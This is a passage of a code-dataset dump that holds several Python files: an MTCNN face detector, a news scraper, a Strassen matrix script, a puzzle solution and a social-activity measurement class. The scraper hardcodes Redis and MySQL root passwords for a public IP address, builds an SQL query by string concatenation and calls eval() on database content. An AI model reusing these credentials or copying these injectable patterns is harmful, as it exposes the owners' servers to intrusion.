dim=0)\n# r_out2 = torch.cat(r_output2_list, dim=0)\n# r_out3 = torch.cat(r_output3_list, dim=0)\n# else:\n# r_out1, r_out2, r_out3 = self.rnet(new_arr)\n#\n# probs =r_out1\n# keep =probs[:, 0] > self.detection_threshold[1]\n# r_out1=r_out1[keep]\n#\n# boxes = boxes[keep]\n# if len(boxes)==0:\n# return boxes\n# boxes[:, 4] = r_out1[:, 0]\n# r_out2 = r_out2[keep]\n# boxes=calibrate_box(boxes,r_out2)\n#\n#\n# #######################################\n# #########rnet finish\n# #######################################\n# boxes=self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[1])\n# if self.verbose:\n# print('rnet:{0} boxes '.format(len(boxes)))\n# #print('total {0} boxes after nms '.format(len(boxes)))\n# boxes = clip_boxes_to_image(boxes, (img.shape[0], img.shape[1]))\n# boxes=self.rerec(to_tensor(boxes),img.shape)\n# new_arr=np.zeros((boxes.shape[0],3,48,48))\n#\n#\n# for k in range(boxes.shape[0]):\n# box=boxes[k]\n# crop_img=img.copy()[int(box[1]):int(box[3]),int(box[0]):int(box[2]),:]\n# if crop_img.shape[0]>0 and crop_img.shape[1]>0:\n# new_arr[k]=Resize((48,48))(crop_img).transpose([2,0,1])/255.0\n# # else:\n# # print(box)\n#\n# new_arr=to_tensor(new_arr)\n# o_out1, o_out2,o_out3 = self.onet(new_arr)\n# probs = o_out1\n# keep = probs[:, 0] > self.detection_threshold[2]\n# o_out1 = o_out1[keep]\n# boxes = boxes[keep]\n# if len(boxes)==0:\n# return boxes\n# boxes[:, 4] = o_out1[:, 0]\n# o_out2 = o_out2[keep]\n# o_out3=o_out3[keep]\n# boxes = calibrate_box(boxes, o_out2)\n#\n# landmarks_x = boxes[:, 0:1] + o_out3[:, 0::2] * (boxes[:, 2:3] - boxes[:, 0:1]+1)\n# landmarks_y = boxes[:, 1:2] + o_out3[:, 1::2] * (boxes[:, 3:4] - boxes[:, 1:2]+1)\n#\n# boxes=torch.cat([boxes,landmarks_x,landmarks_y],dim=-1)\n#\n#\n# #######################################\n# #########onet finish\n# #######################################\n# boxes = self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[2])\n# if self.verbose:\n# print('onet:{0} boxes '.format(len(boxes)))\n# return to_numpy(boxes)\n# else:\n# return None\n# #idx=int(np.argmax(result,-1)[0])\n#\n# else:\n# raise ValueError('the model is not built yet.')\n# def generate_bboxes(self,*outputs,threshold=0.5,scale=1):\n# raise NotImplementedError\n# def nms(self,bboxes):\n# raise NotImplementedError\n#\n\n\nclass mtcnn(ModuleList):\n def __init__(self, pretrained=True, name='mtcnn'):\n super().__init__(name)\n self.nms_threshold = [0.9, 0.9, 0.3]\n self.detection_threshold = [0.5, 0.6, 0.9]\n self.min_size=10\n\n self.add_module('pnet',Pnet(pretrained=pretrained).model)\n self.add_module('rnet', Rnet(pretrained=pretrained).model)\n self.add_module('onet', Onet(pretrained=pretrained).model)\n self.add_module('pnet_detector', DetectorHead(cellsize=12, threshold=0.5, min_size=self.min_size))\n\n\n #adjust bbox like square\n def rerec(self,bboxA,img_shape):\n \"\"\"Convert bboxA to square.\"\"\"\n bboxA=to_numpy(bboxA)\n h = bboxA[:, 3] - bboxA[:, 1]\n w = bboxA[:, 2] - bboxA[:, 0]\n max_len = np.maximum(w, h)\n\n\n bboxA[:, 0] = bboxA[:, 0] -0.5*(max_len-w)\n bboxA[:, 1] = bboxA[:, 1] -0.5*(max_len-h)\n bboxA[:, 2] = bboxA[:, 0]+max_len\n bboxA[:, 3] =bboxA[:, 1]+max_len\n return to_tensor(bboxA)\n def forward(self, x, scale):\n inp =x.exand_dims(0)\n boxes = self.pnet(inp)\n boxes_list=[]\n if boxes is not None and len(boxes) > 0:\n box = boxes[:, :4] / scale\n score = boxes[:, 4:]\n boxes = concate([box.round_(), score], axis=1)\n if len(boxes) > 0:\n boxes_list.append(boxes)\n\n #######################################\n 
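# P-Net stage: proposals from this pyramid scale were rescaled to original-image coordinates (box / scale) above; R-Net refinement follows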
#########pnet finish\n #######################################\n if len(boxes_list) > 0:\n boxes = to_tensor(concate(boxes_list, axis=0))\n\n # print('total {0} boxes in pnet in all scale '.format(len(boxes)))\n boxes = clip_boxes_to_image(boxes, (x.shape[0], x.shape[1]))\n boxes = nms(boxes, threshold=self.detection_threshold[0])\n print('pnet:{0} boxes '.format(len(boxes)))\n # print('total {0} boxes after nms '.format(len(boxes)))\n # score = to_numpy(boxes[:, 4]).reshape(-1)\n if boxes is not None:\n # prepare rnet input\n\n boxes = self.rerec(boxes, x.shape)\n new_arr = np.zeros((boxes.shape[0], 3, 24, 24))\n\n for k in range(boxes.shape[0]):\n box = boxes[k]\n crop_img = x.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n new_arr[k] = Resize((24, 24))(crop_img / 255.0).transpose([2, 0, 1])\n # else:\n # print(box)\n new_arr = to_tensor(new_arr)\n r_output1_list = []\n r_output2_list = []\n r_output3_list = []\n if len(new_arr) > 16:\n for i in range(len(new_arr) // 16 + 1):\n if i * 16 < len(new_arr):\n r_out1, r_out2, r_out3 = self.rnet(new_arr[i * 16:(i + 1) * 16, :, :, :])\n r_output1_list.append(r_out1)\n r_output2_list.append(r_out2)\n r_output3_list.append(r_out3)\n r_out1 = concate(r_output1_list, axis=0)\n r_out2 = concate(r_output2_list, axis=0)\n r_out3 = concate(r_output3_list, axis=0)\n else:\n r_out1, r_out2, r_out3 = self.rnet(new_arr)\n\n probs = to_numpy(r_out1)\n keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]\n r_out1 = r_out1[keep]\n boxes = boxes[keep]\n boxes[:, 4] = r_out1[:, 0]\n r_out2 = r_out2[keep]\n boxes = calibrate_box(boxes, r_out2)\n\n #######################################\n #########rnet finish\n #######################################\n\n boxes = nms(boxes, threshold=self.detection_threshold[1], image_size=(x.shape[0], x.shape[1]), min_size=self.min_size)\n print('rnet:{0} boxes '.format(len(boxes)))\n # print('total {0} boxes after nms '.format(len(boxes)))\n boxes = clip_boxes_to_image(boxes, (x.shape[0], x.shape[1]))\n boxes = self.rerec(boxes, x.shape)\n new_arr = np.zeros((boxes.shape[0], 3, 48, 48))\n\n for k in range(boxes.shape[0]):\n box = boxes[k]\n crop_img = x.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n new_arr[k] = Resize((48, 48))(crop_img / 255.0).transpose([2, 0, 1])\n # else:\n # print(box)\n\n new_arr = to_tensor(new_arr)\n o_out1, o_out2, o_out3 = self.onet(new_arr)\n probs = to_numpy(o_out1)\n keep = np.where(probs[:, 0] > self.detection_threshold[2])[0]\n o_out1 = o_out1[keep]\n boxes = boxes[keep]\n\n boxes[:, 4] = o_out1[:, 0]\n o_out2 = o_out2[keep]\n o_out3 = o_out3[keep]\n boxes = calibrate_box(boxes, o_out2)\n\n landmarks_x = boxes[:, 0:1] + o_out3[:, 0::2] * (boxes[:, 2:3] - boxes[:, 0:1] + 1)\n landmarks_y = boxes[:, 1:2] + o_out3[:, 1::2] * (boxes[:, 3:4] - boxes[:, 1:2] + 1)\n\n boxes = concate([boxes, landmarks_x, landmarks_y], axis=-1)\n #######################################\n #########onet finish\n #######################################\n\n\n\n\nclass Mtcnn(ImageDetectionModel):\n def __init__(self, pretrained=True, min_size=10, **kwargs):\n model=mtcnn(pretrained=pretrained)\n super(Mtcnn, self).__init__(input_shape=(3,12, 12), output=model)\n self.min_size = min_size\n self.signature=get_signature(self.model.forward)\n self.preprocess_flow =[normalize(0,255)]\n\n def get_image_pyrimid(self,img,min_size=None,factor= 0.709):\n if min_size is None:\n 
min_size=self.min_size\n min_face_area = (min_size, min_size)\n h = img.shape[0]\n w = img.shape[1]\n minl = np.amin([h, w])\n m = 12.0 / min_size\n minl = minl * m\n # create scale pyramid\n scales = []\n images = []\n factor_count = 0\n while minl >= 12:\n scales += [m * np.power(factor, factor_count)]\n scaled_img = rescale(scales[-1])(img.copy())\n if img is not None:\n for func in self.preprocess_flow:\n if inspect.isfunction(func):\n scaled_img=func(scaled_img)\n images.append(to_tensor(image_backend_adaption(scaled_img)))\n minl = minl * factor\n factor_count += 1\n return images, scales\n\n\n\n\n\n def infer_single_image(self,img,**kwargs):\n if self.model.built:\n self.model.to(self.device)\n self.model.eval()\n img=image2array(img)\n if img.shape[-1]==4:\n img=img[:,:,:3]\n imgs, scales = self.get_image_pyrimid(img)\n boxes_list = []\n for i in range(len(scales)):\n img=imgs[i]\n scale=scales[i]\n boxes=mtcnn(img,scale)\n boxes_list.append(boxes)\n boxes=concate(boxes_list,axis=0)\n #idx=int(np.argmax(result,-1)[0])\n boxes = nms(boxes, threshold=self.detection_threshold[2], image_size=(img.shape[0], img.shape[1]), min_size=self.min_size)\n print('onet:{0} boxes '.format(len(boxes)))\n return boxes\n else:\n return img\n\n def generate_bboxes(self,*outputs,threshold=0.5,scale=1):\n raise NotImplementedError\n def nms(self,bboxes):\n raise NotImplementedError\n\n\n\n","sub_path":"trident/models/pytorch_mtcnn.py","file_name":"pytorch_mtcnn.py","file_ext":"py","file_size_in_byte":29207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"137958116","text":"import hashlib\nimport json\nimport os\nimport pickle\nfrom datetime import date\nimport time\nfrom urllib.parse import urlparse, urljoin\nimport colorama\nimport requests\nimport sys\nimport mysql.connector\n\nfrom celery import Celery\nCeleryClient = Celery('task_celery', broker='redis://default:d474210009@167.86.120.98:6379/0')\n\napp = Celery('task_celery', broker='redis://default:d474210009@redis:6379/0')\nfrom bs4 import BeautifulSoup\nmydb = mysql.connector.connect(\n host=\"167.86.120.98\",\n port=\"3307\",\n database=\"test_portales\",\n user=\"root\",\n password=\"dalas.2009\"\n)\ndef configuracion(Id_Provincia):\n\n try:\n\n global db_noticias2\n db_noticias2 = {}\n\n if os.path.isfile('persist/db_noticias2'+Id_Provincia+'.bin'):\n db_noticias2 = load_persist(\"db_noticias2\"+Id_Provincia+\"\")\n else:\n db_noticias2 = {}\n except:\n db_noticias2 = {}\n\n\nmugre = [\"xmlns=http://www.w3.org/1999/>\", \"<\\n\", \"\\n>\", \"<
\", \"CDATA\", \">\", \"
\", \"%>\", \"\", \"100%\", \"\", \"<\", \">\", \"'\", '\"', \"\\/\", \"]\", \"[\",\n \"/\",\"-\",\"ttp\",\":\",\"swww\"]\ndef limpiar(texto, mugre):\n for m in mugre:\n texto = texto.replace(m, \"\")\n return texto\ndef hashear(l):\n l = l.encode('utf-8')\n h = hashlib.new( \"sha1\",l)\n return h.hexdigest()\ndef save_persist(elem,id_provincia):\n try:\n vpath = \"./persist/\"\n\n varchivo = vpath + elem + id_provincia + \".bin\"\n with open(varchivo, \"bw\") as archivo:\n pickle.dump(eval(elem), archivo)\n except Exception as e:\n\n print(\"Except de save_persist\", e)\ndef load_persist(elem,id_provincia):\n try:\n vpath = \"./persist/\"\n varchivo = vpath + elem + id_provincia+\".bin\"\n with open(varchivo, \"br\") as archivo:\n # #print(pickle.load(archivo))\n return pickle.load(archivo)\n except Exception as e:\n print(\"269 - Except load_persit \", e)\ndef filtro_repetida(link,Id_Provincia):\n try:\n dd = link.replace(\"\\n\", \"\")[1:200]\n dd = limpiar(dd, mugre)\n dd = hashear(dd)\n r = False\n if dd in db_noticias2.keys():\n if (db_noticias2[dd] == 1):\n r = True\n else:\n r = False\n if not r:\n db_noticias2[dd] = 1\n print(\"\\n ********* \\n No encontrado: \\n\",dd,\"\\n\",link,\"\\n*************\")\n save_persist('db_noticias2',Id_Provincia)\n return r\n except Exception as e:\n print(\"329 - \", e)\ndef filtroReplace(object):\n object.replace(\"/\", \"\").replace(\":\", \"\").replace(\"%\", \"\").replace(\"-\", \"\").replace(\"[\", \"\").replace(\"]\",\"\").replace(\"<\",\"\").replace(\">\", \"\").replace(\"!\", \"\").replace(\",\", \"\")\n return \" \".join(object.split())\ndef contarElementosLista(lista):\n return {i: lista.count(i) for i in lista}\ndef is_valid(url):\n \"\"\"\n Checks whether `url` is a valid URL.\n \"\"\"\n parsed = urlparse(url)\n return bool(parsed.netloc) and bool(parsed.scheme)\ndef get_all_website_links(Portal,Noticiae):\n \"\"\"\n Returns all URLs that is found on `url` in which it belongs to the same website\n \"\"\"\n # all URLs of `url`\n urls = set()\n\n internal_urls = set()\n external_urls = set()\n # domain name of the URL without the protocol\n domain_name = urlparse(Portal).netloc\n #headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0', }\n #soup = BeautifulSoup(requests.get(url,headers=headers).content, \"html.parser\")\n for a_tag in Noticiae.findAll(\"a\"):\n href = a_tag.attrs.get(\"href\")\n if href == \"\" or href is None:\n # href empty tag\n continue\n # join the URL if it's relative (not absolute link)\n href = urljoin(Portal, href)\n parsed_href = urlparse(href)\n # remove URL GET parameters, URL fragments, etc.\n href = parsed_href.scheme + \"://\" + parsed_href.netloc + parsed_href.path\n if not is_valid(href):\n continue\n if href in internal_urls:\n continue\n if domain_name not in href:\n continue\n #print(f\"{GREEN}[*] Internal link: {href}{RESET}\")\n urls.add(href)\n internal_urls.add(href)\n return internal_urls\n\n\n\nif __name__ == \"__main__\":\n\n if len( sys.argv ) > 1:\n Id_Provincia = sys.argv[1]\n colorama.init()\n\n GREEN = colorama.Fore.GREEN\n GRAY = colorama.Fore.LIGHTBLACK_EX\n RESET = colorama.Fore.RESET\n\n Portales = requests.get(\"http://167.86.120.98:6060/Portales?id_provincia=\"+Id_Provincia+\"\").json()\n j = open(\"configGenerico2.json\", \"r\")\n\n confiTagPage = {}\n confiTagPage = json.loads(j.read())\n while True:\n\n for Portal in Portales:\n try:\n #Portal[\"url\"] = 'https://rosarionuestro.com/'\n headers = {'User-Agent': 'Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',}\n response = requests.get(Portal[\"url\"], headers=headers).text\n try:\n mycursor = mydb.cursor()\n\n sql = \"SELECT tag FROM portales_tag where portales like \"+\"'%\"+ Portal[\"url\"]+\"%'\" + \"\"\n mycursor.execute(sql)\n sql = mycursor.fetchall()\n except Exception as e:\n print(\"Error al ejecutar la consulta\")\n for Noti in sql:\n try:\n\n Noticia = eval(Noti[0])\n if Noticia != []:\n for i, Noticiae in enumerate(Noticia):\n links = \"\"\n CantLinks = \"\"\n\n links = get_all_website_links(Portal[\"url\"], Noticiae)\n links = list(links)\n\n\n CantLinks = contarElementosLista(links)\n CantLinks = list(CantLinks)\n\n if len(CantLinks) < 4:\n for link in CantLinks:\n links = ''.join(links)\n\n timeinit = time.time()\n texto = filtroReplace(Noticiae.get_text())\n medio = Portal[\"url\"]\n fecha = date.today()\n\n try:\n mycursor = mydb.cursor()\n sql = \"INSERT INTO todas_las_noticias (link,fecha,titulo,copete,texto,medio,provincia) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s) \"\n val = (link, fecha, \"\", \"\", texto, medio, Id_Provincia)\n mycursor.execute(sql, val)\n mydb.commit()\n print(\"insertó correctamente el link: \" + link + \"\")\n except Exception as e:\n print(\"El Link ya fue guardado: \" + link + \"\")\n \"\"\"\n try:\n \n val = (link, fecha, \"\", \"\", texto, medio, int(Id_Provincia))\n CeleryClient.send_task(\"task_celery.InsertNoticiaMySql\", [{\"val\": val}])\n except Exception as e:\n print(\"El Link ya fue guardado: \" + link + \", \"+ str(e)+\"\")\n \"\"\"\n timefin = time.time() - timeinit\n print(timefin)\n except Exception as e:\n print(\"Error 3 - Obtener Articulos de noticias \", e)\n except Exception as e:\n print(\"Error 3 - Obtener Articulos de noticias \", e)\n\n","sub_path":"ScrapGenericoSonda3.py","file_name":"ScrapGenericoSonda3.py","file_ext":"py","file_size_in_byte":8274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"190381205","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom math import ceil, log\nimport time\nimport argparse\n\ndef read(filename1, filename2):\n lines1 = open(filename1, 'r').read().splitlines()\n lines1 = lines1[1:len(lines1)]\n\n lines2 = open(filename2, 'r').read().splitlines()\n lines2 = lines2[1:len(lines2)]\n\n A = []\n B = []\n matrix1 = A\n matrix2 = B\n for line in lines1:\n if line != \"\":\n matrix1.append(list(map(int, [x for x in line.split(\"\\t\") if x])))\n else:\n matrix1 = C\n\n for line in lines2:\n if line != \"\":\n matrix2.append(list(map(int, [x for x in line.split(\"\\t\") if x])))\n else:\n matrix2 = C\n\n return A, B\n\n\ndef add(A, B):\n n = len(A)\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(n):\n for j in range(n):\n C[i][j] = A[i][j] + B[i][j]\n return C\n\ndef subtract(A, B):\n n = len(A)\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(n):\n for j in range(n):\n C[i][j] = A[i][j] - B[i][j]\n return C\n\ndef strassen(A, B, seuil=2):\n \"\"\"\n Implementation of the strassen algorithm.\n \"\"\"\n n = len(A)\n newSize = n//2\n\n if n <= seuil:\n return conv(A, B)\n else:\n # initializing the new sub-matrices\n \n a11 = [[0 for j in range(newSize)] for i in range(newSize)]\n a12 = [[0 for j in range(newSize)] for i in range(newSize)]\n a21 = [[0 for j in range(newSize)] for i in range(newSize)]\n a22 = [[0 for j in range(newSize)] for i in range(newSize)]\n\n b11 = [[0 for j in range(newSize)] for i in range(newSize)]\n b12 = 
[[0 for j in range(newSize)] for i in range(newSize)]\n b21 = [[0 for j in range(newSize)] for i in range(newSize)]\n b22 = [[0 for j in range(newSize)] for i in range(newSize)]\n\n aResult = [[0 for j in range(newSize)] for i in range(newSize)]\n bResult = [[0 for j in range(newSize)] for i in range(newSize)]\n\n # dividing the matrices in 4 sub-matrices:\n for i in range(newSize):\n for j in range(newSize):\n a11[i][j] = A[i][j] # top left\n a12[i][j] = A[i][j + newSize] # top right\n a21[i][j] = A[i + newSize][j] # bottom left\n a22[i][j] = A[i + newSize][j + newSize] # bottom right\n\n b11[i][j] = B[i][j] # top left\n b12[i][j] = B[i][j + newSize] # top right\n b21[i][j] = B[i + newSize][j] # bottom left\n b22[i][j] = B[i + newSize][j + newSize] # bottom right\n\n # Calculating p1 to p7:\n aResult = add(a11, a22)\n bResult = add(b11, b22)\n p1 = strassen(aResult, bResult, seuil) # p1 = (a11+a22) * (b11+b22)\n\n aResult = add(a21, a22) # a21 + a22\n p2 = strassen(aResult, b11,seuil) # p2 = (a21+a22) * (b11)\n\n bResult = subtract(b12, b22) # b12 - b22\n p3 = strassen(a11, bResult, seuil) # p3 = (a11) * (b12 - b22)\n\n bResult = subtract(b21, b11) # b21 - b11\n p4 =strassen(a22, bResult, seuil) # p4 = (a22) * (b21 - b11)\n\n aResult = add(a11, a12) # a11 + a12\n p5 = strassen(aResult, b22, seuil) # p5 = (a11+a12) * (b22)\n\n aResult = subtract(a21, a11) # a21 - a11\n bResult = add(b11, b12) # b11 + b12\n p6 = strassen(aResult, bResult, seuil) # p6 = (a21-a11) * (b11+b12)\n\n aResult = subtract(a12, a22) # a12 - a22\n bResult = add(b21, b22) # b21 + b22\n p7 = strassen(aResult, bResult, seuil) # p7 = (a12-a22) * (b21+b22)\n\n # calculating c21, c21, c11 e c22:\n c12 = add(p3, p5) # c12 = p3 + p5\n c21 = add(p2, p4) # c21 = p2 + p4\n\n aResult = add(p1, p4) # p1 + p4\n bResult = add(aResult, p7) # p1 + p4 + p7\n c11 = subtract(bResult, p5) # c11 = p1 + p4 - p5 + p7\n\n aResult = add(p1, p3) # p1 + p3\n bResult = add(aResult, p6) # p1 + p3 + p6\n c22 = subtract(bResult, p2) # c22 = p1 + p3 - p2 + p6\n\n # Grouping the results obtained in a single matrix:\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(newSize):\n for j in range(newSize):\n C[i][j] = c11[i][j]\n C[i][j + newSize] = c12[i][j]\n C[i + newSize][j] = c21[i][j]\n C[i + newSize][j + newSize] = c22[i][j]\n return C\n\n\ndef conv(A, B):\n n = len (A)\n C = [[0 for i in range(n)] for j in range(n)]\n for j in range(n):\n for i in range(n):\n for k in range(n):\n C[j][i] += A[k][i]*B[j][k]\n return C\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # parser.add_option(\"-l\", dest=\"LEAF_SIZE\", default=\"8\",\n # help=\"when do you start using ikj\", metavar=\"LEAF_SIZE\")\n\n parser.add_argument(\"algo\")\n parser.add_argument(\"path1\")\n parser.add_argument(\"path2\")\n parser.add_argument(\"-p\", \"--print\", action = \"store_true\")\n parser.add_argument(\"-t\", \"--time\", action=\"store_true\")\n\n args = parser.parse_args()\n A, B = read(args.path1, args.path2)\n\n start = 0\n end = 0\n seuil = 32\n if args.algo == 'strassen':\n start = time.time()\n C = strassen(A, B)\n end = time.time()\n \n elif args.algo == 'strassenSeuil':\n \n start = time.time()\n C = strassen(A, B, seuil)\n end = time.time()\n\n elif args.algo == 'conv':\n start = time.time()\n C = conv(A, B)\n end = time.time()\n else:\n \tprint (\"argument de l'option -a invalides\")\n \n if args.time: \n resultat = end - start\n 
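# elapsed wall-clock time in seconds (printed only when -t/--time is passed)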
print(resultat)\n","sub_path":"source/teststrassen.py","file_name":"teststrassen.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"640024298","text":"from functools import lru_cache\n\n\nclass Graph:\n\n def __init__(self, ints) -> None:\n super().__init__()\n self.ints = ints\n self.precalc = {}\n\n def next_nodes(self, idx):\n return [i for i in range(idx + 1, min(idx + 4, len(self.ints))) if self.ints[i] - self.ints[idx] <= 3]\n\n def count_paths(self, idx, curr_paths):\n if idx == len(self.ints) - 1:\n return curr_paths + 1\n\n if idx in self.precalc:\n return self.precalc[idx]\n for next_node in self.next_nodes(idx):\n self.precalc[next_node] = self.count_paths(next_node, curr_paths)\n curr_paths += self.precalc[next_node]\n return curr_paths\n\n\n@lru_cache(None)\ndef arrangements(jolts, prev) -> int:\n \"\"\"The number of arrangements that go from prev to the end of `jolts`.\"\"\"\n first, rest = jolts[0], jolts[1:]\n if first - prev > 3:\n return 0\n elif not rest:\n return 1\n else:\n return (arrangements(rest, first) + # Use first\n arrangements(rest, prev)) # Skip first\n\n\ndef do_it(filename):\n with open(filename) as f:\n ints = sorted(list(map(int, f)))\n # ints = [0] + ints + [max(ints) + 3]\n return arrangements(tuple(ints), 0)\n\n\nif __name__ == '__main__':\n output = do_it('input1.txt')\n print(f'Result: {output}')\n\n# Result: 10578455953408\n","sub_path":"2020/10/102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458790632","text":"import pandas as pd\nimport pickle as pkl\nimport numpy as np\n\nfrom .measurements import MeasurementsBaseClass\nfrom .validators import check_empty\nfrom .validators import check_root_only\n\n\"\"\"\nNotes:\n - If no metadata then run community measurements as if there is a single \n community containing every node.\n\"\"\"\n\nclass SocialActivityMeasurements(MeasurementsBaseClass):\n def __init__(self, dataset, configuration, metadata, platform,\n content_node_ids=[], user_node_ids=[]):\n \"\"\"\n Description:\n\n Input:\n :dataset:\n :configuration:\n :metadata:\n\n Output:\n None\n \"\"\"\n super().__init__(dataset, configuration)\n\n self.measurement_type = 'social_activity'\n self.platform = platform\n\n\n self.contribution_events = [\n 'PullRequestEvent',\n 'PushEvent',\n 'IssuesEvent',\n 'IssueCommentEvent',\n 'PullRequestReviewCommentEvent',\n 'CommitCommentEvent',\n 'CreateEvent',\n 'post',\n 'tweet'\n ]\n\n self.popularity_events = [\n 'WatchEvent',\n 'ForkEvent',\n 'comment',\n 'post',\n 'retweet',\n 'quote',\n 'reply'\n ]\n\n self.main_df = self.preprocess(dataset)\n\n # store action and merged columns in a seperate data frame that is not \n # used for most measurements\n if platform=='github' and len(self.main_df.columns)==6 and 'action' in self.main_df.columns:\n self.main_df_opt = self.main_df.copy()[['action', 'merged']]\n self.main_df = self.main_df.drop(['action', 'merged'], axis=1)\n else:\n self.main_df_opt = None\n\n # For content centric\n if content_node_ids=='all':\n self.selectedContent = self.main_df\n else:\n if self.platform in ['reddit', 'twitter']:\n self.selectedContent = self.main_df[self.main_df.root.isin(content_node_ids)]\n elif self.platform=='github':\n self.selectedContent = self.main_df[self.main_df.content.isin(content_node_ids)]\n\n # For userCentric\n self.selectedUsers = 
self.main_df[self.main_df.user.isin(user_node_ids)]\n\n if metadata is not None:\n if metadata.use_content_data:\n self.useContentMetaData = True\n self.contentMetaData = metadata.content_data\n else:\n self.useContentMetaData = False\n\n if metadata.use_user_data:\n self.useUserMetaData = True\n self.UserMetaData = metadata.user_data\n else:\n self.useUserMetaData = False\n\n else:\n self.useContentMetaData = False\n self.useUserMetaData = False\n\n # For community measurements\n # Load and preprocess metadata\n if self.useUserMetaData and self.useContentMetaData:\n self.comDic = metadata.build_communities(self.contentMetaData,\n self.UserMetaData)\n else:\n self.comDic = {}\n\n if self.platform=='github':\n self.communityDF = self.getCommmunityDF('community')\n elif self.platform=='reddit':\n self.communityDF = self.getCommmunityDF('subreddit')\n elif self.platform=='twitter':\n self.communityDF = self.getCommmunityDF('')\n\n\n def preprocess(self, dataset):\n \"\"\"\n Description:\n\n Input:\n\n Output:\n Edit columns, convert date, sort by date\n \"\"\"\n events = self.popularity_events+self.contribution_events\n mapping = {'actionType' : 'event',\n 'nodeID' : 'content',\n 'nodeTime' : 'time',\n 'nodeUserID' : 'user'}\n\n if self.platform=='reddit':\n mapping.update({'communityID' : 'subreddit',\n 'keywords' : 'keywords',\n 'parentID' : 'parent',\n 'rootID' : 'root'})\n elif self.platform=='twitter':\n mapping.update({'parentID' : 'parent',\n 'rootID' : 'root'})\n elif self.platform=='github':\n mapping.update({'actionSubType' : 'action',\n 'status' : 'merged'})\n\n dataset = dataset.rename(index=str, columns=mapping)\n dataset = dataset[dataset.event.isin(events)]\n dataset = dataset.sort_values(by='time')\n dataset = dataset.assign(time=dataset.time.dt.floor('h'))\n\n return dataset\n\n\n def readPickleFile(self, filepath):\n with open(filepath, 'rb') as f:\n pickle_object = pkl.load(f)\n return pickle_object\n\n\n def getCommmunityDF(self, community_col):\n if community_col in self.main_df.columns:\n return self.main_df.copy()\n\n elif community_col!='':\n dfs = []\n\n content_community_types = ['topic','language']\n user_community_types = ['city','country','company','locations']\n\n #content-focused communities\n for community in content_community_types:\n if community in self.comDic.keys():\n for key in self.comDic[community]:\n d = self.main_df[self.main_df['content'].isin(self.comDic[community][key])]\n d[community_col] = key\n dfs.append(d)\n\n #user-focused communities\n for community in user_community_types:\n if community in self.comDic.keys():\n for key in self.comDic[community]:\n d = self.main_df[self.main_df['user'].isin(self.comDic[community][key])]\n d[community_col] = key\n dfs.append(d)\n\n if len(dfs)==0:\n result = self.main_df.copy()\n result['community'] = 'all'\n else:\n result = pd.concat(dfs)\n\n return result\n\n\n def getCommunityMeasurementDict(self, dataset):\n measurements = {}\n if isinstance(dataset, pd.DataFrame):\n for community in dataset['community'].unique():\n measurements[community]=dataset[dataset.community==community]\n del measurements[community]['community']\n elif isinstance(dataset, pd.Series):\n series_output = False\n for community in dataset.index:\n measurements[community] = dataset[community]\n try:\n len(dataset[community])\n series_output = True\n except:\n pass\n\n if series_output:\n for community in measurements:\n measurements[community] = pd.Series(measurements[community])\n\n return measurements\n\n\n def getProportion(self, 
eventTypes=None, community_field=\"subreddit\"):\n \"\"\"\n Calculates the proportion of each event type in the data.\n Question #7\n Inputs: df - Events data frame\n communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n eventTypes - List of event types to include\n Output: Dictionary of data frames with columns for event type and proportion, with one data frame for each community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n p = df[['user','event',community_field]].groupby([community_field,'event']).count()\n p = p.reset_index()\n p.columns = ['community','event', 'value']\n\n community_totals = p[['community','value']].groupby('community').sum().reset_index()\n community_totals.columns = ['community','total']\n p = p.merge(community_totals, on='community',how='left')\n\n p['value'] = p['value']/p['total']\n del p['total']\n\n measurement = self.getCommunityMeasurementDict(p)\n\n return measurement\n\n\n def contributingUsers(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n This method calculates the proportion of users with events in teh data who are active contributors.\n Question #20\n Inputs: df - Events data\n Output: Proportion of all users who make active contributions\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n #total number of unique users\n totalUsers = df.groupby(community_field)['user'].nunique()\n totalUsers.name = 'total_users'\n\n df = df[df['event'].isin(self.contribution_events)]\n\n #number of unique users with direct contributions\n contribUsers = df.groupby(community_field)['user'].nunique()\n contribUsers.name = 'contributing_users'\n\n df = pd.concat([totalUsers, contribUsers], axis=1).fillna(0)\n\n df['value'] = df['contributing_users']/ df['total_users']\n\n measurement = self.getCommunityMeasurementDict(df['value'])\n\n return measurement\n\n\n def getNumUserActions(self,unit='h',eventTypes=None,community_field='subreddit'):\n \"\"\"\n Calculate the average temporal user contribution counts within the data set.\n Question #23\n Inputs: df - Events data frame\n unit - Time granularity for time series calculation\n eventTypes - List of event types to include\n Output: Data frame containing a time series of average event counts\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = [0 for i in range(len(df))]\n df = df.set_index('time')\n\n #get event counts for each user within each time unit\n df 